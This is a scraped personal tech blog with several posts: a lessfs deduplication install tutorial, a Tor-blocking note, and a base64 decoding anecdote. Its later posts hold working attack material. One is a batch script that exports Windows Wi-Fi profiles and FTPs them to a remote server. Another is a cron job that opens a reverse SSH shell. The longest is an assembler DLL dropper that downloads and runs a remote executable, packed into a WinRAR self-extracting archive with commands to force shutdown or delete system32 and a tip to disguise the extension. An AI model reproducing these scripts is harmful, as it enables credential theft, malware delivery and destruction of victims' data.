Linux Storage Deduplication Solution

Lessfs is a high-performance inline data deduplication filesystem written for Linux and is currently licensed under the GNU General Public License version 3. It also supports LZO, QuickLZ and BZip compression (among a couple others), and data encryption. At the time of this writing, the latest stable version is 1.6.0-beta2, which can be downloaded from the SourceForge project page:
http://sourceforge.net/projects/lessfs/files/lessfs

Before installing the lessfs package, make sure you install all known dependencies for it. Some, if not most, of these dependencies may be available in your distribution’s package repositories. You will need to install a few manually though, including mhash, tokyocabinet and fuse (if not already installed).

Your distribution may have the libraries for mhash2 either available or installed, but lessfs still requires mhash. This also can be downloaded from SourceForge:
http://sourceforge.net/projects/mhash/files/mhash
. At the time of this writing, the latest stable build is 0.9.9.9. Download, build and install the package:

$ tar xvzf mhash-0.9.9.9.tar.gz $ cd mhash-0.9.9.9/ $ ./configure $ make $ sudo make install

Lessfs also requires tokyocabinet, as it is the main database on which it relies. The latest stable build is 1- 4.47. To build tokyocabinet, you need to have zlib1g-dev and libbz2-dev already installed, which usually are provided by most, if not all, mainstream Linux distributions.

Download, build and install the package using the same configure, make and sudo make install commands from earlier. On 32-bit systems, you need to append –enable-off64 to the configure command. Failure to use –enable-off64 limits the databases to a 2GB file size.

If it is not already installed or if you want to use the latest and greatest stable build of FUSE, download it from SourceForge:
http://sourceforge.net/projects/fuse
. At the time of this writing, the latest stable build is 2.8.5. Download, build and install the package using the same configure, make and sudo make install commands from earlier.

After resolving all the more obscure dependencies, you’re ready to build and install the lessfs package. Download, build and install the package using the same configure, make and sudo make install commands from earlier.

Now you’re ready to go, but before you can do anything, some preparation is needed. In the lessfs source directory, there is a subdirectory called etc/, and in it is a configuration file. Copy the configuration file to the system’s /etc directory path:

$ sudo cp etc/lessfs.cfg /etc/

This file defines the location of the databases among a few other details (which I discuss later in this article, but for now let’s concentrate on getting the filesystem up and running). You will need to create the directory path for the file data (default is /data/dta) and also for the metadata (default is /data/mta) for all file I/O operations sent to/from the lessfs filesystem. Create the directory paths:

$ sudo mkdir -p /data/{dta,mta}

Initialize the databases in the directory paths with the mklessfs command:

$ sudo mklessfs -c /etc/lessfs.cfg

The -c option is used to specify the path and name of the configuration file. A man page does not exist for the command, but you still can invoke the on-line menu with the -h command option.

Now that the databases have been initialized, you’re ready to mount a lessfs-enabled filesystem. In the following example, let’s mount it to the /mnt path:

$ sudo lessfs /etc/lessfs.cfg /mnt

When mounted, the filesystem assumes the total capacity of the filesystem to which it is being mounted. In my case, it is the filesystem on /dev/sda1:

$ df -t fuse.lessfs Filesystem 1K-blocks Used Available Use% Mounted on lessfs 5871080 3031812 2541028 55% /mnt $ df -t ext4 Filesystem 1K-blocks Used Available Use% Mounted on /dev/sda1 5871080 3031812 2541028 55% /

Currently, you should see nothing but a hidden .lessfs subdirectory when listing the contents of the newly mounted lessfs volume:

$ ls -a /mnt/ . .. .lessfs

Once mounted, the lessfs volume can be unmounted like any other volume:

$ sudo umount /mnt

Let’s put the volume to the test. Writing file data to a lessfs volume is no different from what it would be to any other filesystem. In the example below, I’m using the dd command to write approximately 100MB of all zeros to /mnt/test.dat:

$ sudo dd if=/dev/zero of=/mnt/test.dat bs=1M count=100 100+0 records in 100+0 records out 104857600 bytes (105 MB) copied, 5.05418 s, 20.7 MB/s

Seeing how the filesystem is designed to eliminate all redundant copies of data and being that a file filled with nothing but zeros qualifies as a prime example of this, you can observe that only 48KB of capacity was consumed, and that may just be nothing more than the necessary data synchronized to the databases:

$ df -t fuse.lessfs Filesystem 1K-blocks Used Available Use% Mounted on lessfs 5871080 3031860 2540980 55% /mnt

If you list a detailed listing of that same file in the lessfs-enabled directory, it appears that all 100MB have been written. Utilizing its embedded logic, lessfs reconstructs all data on the fly when additional read and write operations are initiated to the file(s):

$ ls -l total 102400 -rw-r–r– 1 root root 104857600 2011-02-26 13:57 test.dat

Now, let’s work with something a bit more complex—something containing a lot of random data. For this example, I decided to download the latest stable release candidate of the Linux kernel source
from
http://www.kernel.org
, but before I did, I listed the total capacity consumed available on the lessfs volume as a reference point:

$ df -t fuse.lessfs Filesystem 1K-blocks Used Available Use% Mounted on lessfs 5871080 3031896 2540944 55% /mnt $ sudo wget http://www.kernel.org/pub/linux/kernel/v2.6/ ↪testing/linux-2.6.38- rc6.tar.bz2

Listing the contents, you can see that the package is approximately 75MB:

$ ls -l linux-2.6.38-rc6.tar.bz2 -rw-r–r– 1 root root 74783787 2011-02-21 19:50 ↪linux-2.6.38-rc6.tar.bz2

Listing the capacity used to store the Linux kernel source archive yields a difference of roughly 75MB:

$ df -t fuse.lessfs Filesystem 1K-blocks Used Available Use% Mounted on lessfs 5871080 3106440 2466400 56% /mnt

Now, let’s create a copy of the archived kernel source:

$ sudo cp linux-2.6.38-rc6.tar.bz2 linux-2.6.38-rc6.tar.bz2-bak $ ls -l linux-2.6.38-rc6.tar.bz2* -rw-r–r– 1 root root 74783787 2011-02-21 19:50 ↪linux-2.6.38-rc6.tar.bz2 -rw-r–r– 1 root root 74783787 2011-02-26 14:43 ↪linux-2.6.38-rc6.tar.bz2-bak

By having a redundant copy of the same file, an additional 44KB is consumed—not nearly as much as an additional 75MB:

$ df -t fuse.lessfs Filesystem 1K-blocks Used Available Use% Mounted on lessfs 5871080 3106484 2466356 56% /mnt

And, because the databases contain the actual file and metadata, if an accidental or intentional system reboot occurred, or if for whatever reason you need to unmount the filesystem, the physical data will not be lost. All you need to do is invoke the same mount command and everything is restored:

$ sudo umount /mnt/ $ sudo lessfs /etc/lessfs.cfg /mnt $ ls linux-2.6.38- rc6.tar.bz2 linux-2.6.38-rc6.tar.bz2-bak

In the situation when a system suffers from an accidental reboot, possibly due to power loss, as of version 1.0.4, lessfs supports transactions, which eliminates the need for an fsck after a crash.

Shifting focus back to lessfs preparation, note that the lessfs volume’s options can be defined by the user when mounting. For instance, you can define the desired options for big_write, max_read and max_write. The big_write improves throughput when used for backup purposes, and both max_read and max_write must be defined to use it. The max_read and max_write options always must be equal to one another and define the block size for lessfs to use: 4, 8, 16, 32, 64 and 128KB.

The definition of a block size can be used to tune the filesystem. For example, a larger block size, such as 128KB (131072), offers faster performance but, unfortunately, at the cost of less deduplication (remember from earlier that lessfs uses block-level deduplication). All other options are FUSE-generic options defined in the FUSE documentation. An example of the use of supported mount options can be found in the lessfs man page:

$ man 1 lessfs

The following example is given to mount lessfs with a 128KB block size:

$ sudo lessfs /etc/lessfs.cfg /fuse -o negative_timeout=0,\ entry_timeout=0,attr_timeout=0,use_ino,\ readdir_ino, default_permissions,allow_other,big_writes,\ max_read=131072,max_write=131072

Additional configurable options for the database exist in your lessfs.cfg file (the same file you copied over to the /etc directory path earlier). The block size can be defined here as well as even the method of additional data compression to use on the deduplicated data and more. Below is an excerpt of what the configuration file contains. In order to define a new value for various options clearly, just uncomment the option desired and, in turn, comment everything else:

BLKSIZE=131072 #BLKSIZE=65536 #BLKSIZE=32768 #BLKSIZE=16384 #BLKSIZE=4096 #COMPRESSION=none COMPRESSION=qlz #COMPRESSION=lzo #COMPRESSION=bzip #COMPRESSION=deflate #COMPRESSION=disabled

This excerpt defines the default block size to 128KB and the default compression method to QuickLZ. If the defaults are not to your liking, in this file you also can define the commit to disk intervals (default is 30 seconds) or a new path for your databases, but make sure to initialize the databases before use; otherwise, you’ll get an error when you try to mount the lessfs filesystem.

Summary

Now, Linux is not limited to a single data deduplication solution. There also is SDFS, a file-level deduplication filesystem that also runs on the FUSE module. SDFS is a freely available cross-platform solution (Linux and Windows) made available by the Opendedup Project. On its official Web site, the project highlights the filesystem’s scalability (it can dedup a petabyte or more of data); speed, performing deduplication/reduplication at a line speed of 290MB/s and higher; support for VMware while also mentioning its usage in Xen and KVM; flexibility in storage, as deduplicated data can be stored locally, on the network across multiple nodes (NFS/CIFS and iSCSI), or in the cloud; inline and batch mode deduplication (a method of post-process deduplication); and file and folder snapshot support. The project seems to be pushing itself as an enterprise-class solution, and with features like these, Opendedup means business.

It is also not surprising that since 2008, data deduplication has been a requested feature for Btrfs, the next- generation Linux filesystem. Although that also may be in response to Sun Microsystem’s (now Oracle’s) development of data deduplication into its advanced ZFS filesystem. Unfortunately, at this point in time, it is unknown if and when Btrfs will introduce data deduplication support, although it already contains support for various types of data compression (such as zlib and LZO).

Currently, the lessfs2 release is under development, and it is supposed to introduce snapshot support, fast inode cloning, new databases (including hamsterdb and possibly BerkeleyDB) apart from tokyocabinet, self- healing RAID (to repair corrupted chunks) and more.

As you can see, with a little time and effort, it is relatively simple to utilize the recent trend of data deduplication to reduce the total capacity consumed on a storage volume by removing all redundant copies of data. I recommend its usage in not only server administration but even for personal use, primarily because with implementations such as lessfs, even if there isn’t too much redundant data, the additional data compression will help reduce the total size of the file when it is eventually written to disk. It is also worth mentioning that the lessfs-enabled volume does not need to remain local to the host system, but it also can be exported across a network via NFS to even iSCSI and utilized by other devices within that same network, providing a more flexible solution.

Posted in Linux, Security, Server | Leave a comment

Open once again

For those who have visited this site in the past few months, my apologies for the lock down. I was having a lot of legal trouble with my posts. I honestly had absolutely no intention of opening this site back up until I received a heart-warming email from a community member today thanking me for the tools I’ve shared here and asking me if I would open this site back up. I definitely didn’t expect that and thanks Chris for your message.

Well here you go, it’s back up. I can’t guarantee that I’ll post more too often but I’ll do my best.

 

~Ryan

Posted in Uncategorized | Leave a comment

Utilities for Blocking Tor exit nodes (Linux & Windows)

(NOTE: Some aspects of these utilities need revision, they will be in development for a while, sorry for the inconvenience)

I’ve been working on a solution to block Tor nodes on Windows and Linux web servers but they change so frequently that I knew it needed an automated process to get it done. I got a little lazy and frustrated with Windows so I wrote two Bash scripts to automate the process. They will work for a Windows server, but you need a Linux machine as well. If you’re a Windows person and refuse to have at least one Linux machine on your network, this site isn’t for you in the first place, deal with it.

The first script (TorBlock) it used to block Tor traffic on a local Linux server or can also configure a Windows server’s .htaccess file to block the traffic. This script can be run once or added to Cron to always keep the list of Tor IP addresses up to date.

The second script (TorTrack) is used to search through access logs and display access attempts from IP addresses associated with Tor. This script can also be run for a local Linux server or a remote Windows server. There are also additional instructions to configure your log filter options.

The code, documentation and instruction set are hosted here: Tor Doco

Source code provided below for those who don’t wish the download. Note: These tools will not work if you don’t read to documentation listed above.

I am releasing these with no license. Use, modify and distribute as you wish. Enjoy!

~Ryan MacNeille

Posted in Hacking, Linux, Networking, Scripts, Security, Server, Tips, Windows | Leave a comment

Extract Any Wireless Password in Plain Text

Microsoft Windows has had the convenient “Wireless Profile” utility for quite some time, enabling users to export and import authentication for their wireless networks. The export process requires migrating through Wireless Network Connection settings and creating an XML file of the password hash through the GUI. This can be a long process that takes too much time. Luckily, the netsh utility can extract this data for us with a few commands. After some struggle, I have created a small batch file that can extract ALL wireless profiles, copy them to a remote server and display the passwords in plain text.

Interestingly, it doesn’t matter which security protocol you use for protecting your network, this process will still display the passwords in plain text.

Here’s the script:

@echo off

mkdir c:\Temp
netsh wlan export profile folder=c:\Temp
@ftp -i -s:”%~f0″&GOTO:EOF
open myserver.com
my_username
my_password
!:— FTP commands below here —
cd location/for/storage
put c:\Temp\*.xml
disconnect
quit
del c:\Temp\*.xml
bye

Now that we have the XML profiles on our own server, we can extract the plain text passwords by loading them on another machine with the command:

netsh wlan add profile filename=”Your_New_XML_File.xml”

Now check your profiles:

netsh wlan show profiles

Now that the new profile has been added, use the Windows GUI to view the Wireless Network Properties. Under the “Security” tab you will see the network security type, encryption type and will also have the option to “Show Characters”. This will display the network password in plain text.

Of course, this script can be run remotely on multiple machines simultaneously using the psexec utility or your Metasploit module of choice but I won’t be sharing the syntax here for obvious reasons. It is a little scary to think how easy it would be to run this script network-wide at a coffee shop, hotel or even a large organization. Personally, I think Microsoft should introduce some additional security for their Network Profile wizard but that’s just… like…  my opinion, man.

~Ryan MacNeille

Posted in Hacking, Networking, Scripts, Windows | 1 Comment

Mac/Linux/bsd – Dirty Anti-Theft Preparation

This isn’t by any means an elegant trick, but it can certainly come in handy if your laptop is ever stolen.

Create a new shell script and add it to Cron – running every 10-30 minutes, or whenever you like.

Add this to the script:

if wget http://myserver.com/sshreverse;
  then ssh -R 2900:localhost:22 [2] User@myserver.com;
fi

Now, if your computer is ever stolen, place a file on your webserver called “sshreverse”. Wait a little while for Cron to run the script, then run:

ssh whatever_your_username_is_on_your_machine@localhost -p 2900

This will create a reverse shell back to your machine. You can do whatever you want at this point; install a keylogger, take pictures from the webcam, destroy the network, etc.

This is a true reverse SSH session so it will get around NAT devices like WiFi routers or firewalls as well.

Posted in Hacking, Linux, Networking, Scripts, Tips | 1 Comment

Self Extracting Archive Trickery

Alright, I’ve been working on this for about a week and finally got it working tonight. Some archive applications offer the ability to create an SFX (Self Extracting Archive). This is a really neat trick that can be used for all kinds of things, including creating auto-downloading & running viruses. I’m sure that wasn’t the intention of the programmers, but it’s very simple with a small custom dll.

First we need to make our dll. This file will be added to the archive and will be automatically executed. The function of the dll is to download a file from the internet and run it instantly. We’re going to use a Flat Assembler to create the dll. (
http://flatassembler.net
)

Download and launch FASMW.

Copy and paste this code into the program:

format PE GUI 4.0 DLL
  entry DllEntryPoint
include 'win32a.inc'
 section '.data' data readable writeable
CMD_OPEN db 'open',0
  url db 'http://remotesite.org/YourFile.exe',0
  output db 'c:\\YourFile.exe',0
section '.text' code readable executable
proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
  mov eax,TRUE
  ret
  endp
 proc dcscdownload
  xor eax, eax
  invoke URLDownloadToFile, 0, url, output, 0, NULL ; download
  cmp eax, 0
  invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
  ret
  endp
 section '.idata' import data readable writeable
library kernel,'KERNEL32.DLL',\
  urlmon,'URLMON.DLL',\
  Shell32,'SHELL32.DLL',\
  user,'USER32.DLL'
import Shell32,\
  ShellExecute,'ShellExecuteA'
import user,\
  MessageBox,'MessageBoxA'
import urlmon,\
  URLDownloadToFile,'URLDownloadToFileA'
section '.edata' export data readable
export 'OURDLL.DLL',\
  dcscdownload,'dcscdownload'
section '.reloc' fixups data discardable

This is just the basic code for the dll. There a few things you should know at this point. You need to go back into this code and change the URL DB to the remote file that you want to be downloaded, and the OUTPUT DB to the location you want the file to be saved. Note: the file names HAVE to match, ie: If the file on the remote server is called Notepad.exe, the saved file must also be exactly named Notepad.exe.

Also, if you have issues with FASMW not accepting the ‘input win32a.include’ you may have to use an absolute path to the file. It is in the FASM/INCLUDE directory.

Once you’re done, go ahead and choose Run->Compile and save the dll with whatever name you want. I called mine marrer.dll. Now we can finally launch our Archive program and create the SFX, I’m going to use WinRAR for this walk-through.

Once WinRAR is installed, you can right-click on the dll and choose the WinRAR option ‘Add to Archive’. Under ‘Archive Options’, select ‘Create SFX Archive’, then move to the Advanced tab and click on ‘SFX Options’. This will open up the SFX dialog where you can set a  huge variety of options. We’re just going to be modifying the archive directory and ‘Run After Archive’ option. The ‘Run Before Archive’ option can be very handy if you want to run commands locally or launch programs that you know are already installed, say for instance:  %SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 1

There are also options like “Run as Administrator”, giving rights to the system, and “Delete files after extraction” which accepts custom parameters like… Oh I don’t know…  %SYSTEMDRIVE%\windows\system32\ ;)

Alright so, for our SFX, we’ll set the archive directory to %APPDATA%\dcsc\ and put this into the ‘Run After Archive’ field:

%SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\marrer.dll, dcscdownload

Note: You need to change the dll name here to whatever you named it before. Then just hit okay and that’s it!

The result here is that the archive will automatically load the dll, and the dll will instantly download, save and run a file from a remote server.

There are a few downsides to using SFX files as attacks. For instance, the .exe extension should be a dead giveaway, but using Unicode overrides, you can easily hide that. The only other downside is the extraction option box that opens up when the SFX is executed, which gives the user the option to change the installation directory. I’m sure this can be removed/ignored but I’ve spent too much time on this already so I’ll leave that up to you guys if you want to try it.

Either way, throw this dll in an archive and set those parameters, fill the archive with useful files and hand it over to someone. The options with this trick are pretty much endless, you can have the dll download a full-blown virus or a quiet keylogger, it’s up to you.

The intention of this article of course is not to advocate malicious cyber activity, rather to inform users of the potential of self-extracting archives in effort to remain vigilant against potential attacks comprised with this method.

~Ryan MacNeille

Posted in Hacking, Tips, Windows | Leave a comment

All About Reverse Engineering Cryptography

I had a disappointing experience yesterday involving a long string of seemingly encrypted text that was sent to me. It originated from an anonymous email address at a temporary subdomain. My first thought was: “Ooo! Someone is trying to send me a secret message and is relying on, or testing my skills to view it.” I was quite excited to see what was hiding within the garbage so I started right away.

The string contained upper and lower case letters as well as numbers, and ended with the usual double equals (==). What caught my eye was a randomly located separation using plus signs (+). This is when I realized that my confusion was valid. We’ll come back to this later.

A lot of people get confused about encrypted text as opposed to hashed text, and this is where people give up. Attempting online “decrypters” and commonly shared tutorials will leave you feeling defeated. A simple explanation is that hash values are used to verify a password, but the password cannot be recovered from the stored value alone, where encrypted values actually contain a modified version of the original text that we want.

If you’re dealing with a short string of text, Ie: 16 bytes or so, you’re not dealing with meaningful ASCII or UTF-8 strings. If the value is known to be stored for password verification, then it is most likely a hash function that has been computed over the password; the one classical hash function with a 128-bit output is MD5, but it could be many things.

The best way to figure out what you’re dealing with is to look at the application code. Application code is incarnated in a tangible way which is not, and cannot be,  protected as well as a secret key can. Therefore, reverse engineering is pretty much the only way to go.

In this regard, reverse engineering is not a topic that will be easily discussed as the specific techniques may bring about undesired interest. My only recommendation for those who found this page in high hopes would be to venture to the deep web and either ask questions or find someone who would be willing to do the work for you. However, educated guesses can go a long way so I will cover a few here;

  • If the same user were to change his password but reuse the original, does the stored value change? If so, then part of the value is most likely a randomized “salt” or IV (assuming symmetric encryption).
  • Assuming that the value is deterministic from the password for a given user, if two users choose the same password, does it result in the same stored value ? If not, then the user name is most likely part of the computation. You may want to try to compute MD5 [username:password] or other similar variants, to see if you can get a match.
  • Is the password length limited? Namely, if you set a 50-character password and cannot successfully authenticate by typing only the first 49 characters, then this means that all characters are important, and this implies that this really is password hashing, not encryption.

Now, back to my email. I didn’t notice any slashes (/) in the code but still felt the need to strip it down to hexadecimal, it always looks so much nicer. On a Linux machine, I ran the folloing command:

perl -MMIME::Base64 -le ‘print unpack “H*”, decode_base64 “Insert code here”

This command successfully converted the Base64 code into a plain hexadecimal format. This was the point that I started to get excited. Now I just had to run the hex code through an ASCII conversion and I’d have the original text. I used the following to complete the conversion:

import binascii
binascii.a2b_hex(“Insert code here”)

a Then I finally had my original text. The hexadecimal code was over 1,000 bytes so it was a little long but I noticed some formatting that looked similar to HTML. I quickly dumped the output into a new text document and gave it a .html extension. Upon opening the file in a browser, my heart sunk a little. It was a poorly formatted add for Viagra & Cialis. It was simply a Base64 string of html code that wasn’t properly encoded for the email.

~Ryan MacNeille

Posted in Hacking, Linux, Tips | 7 Comments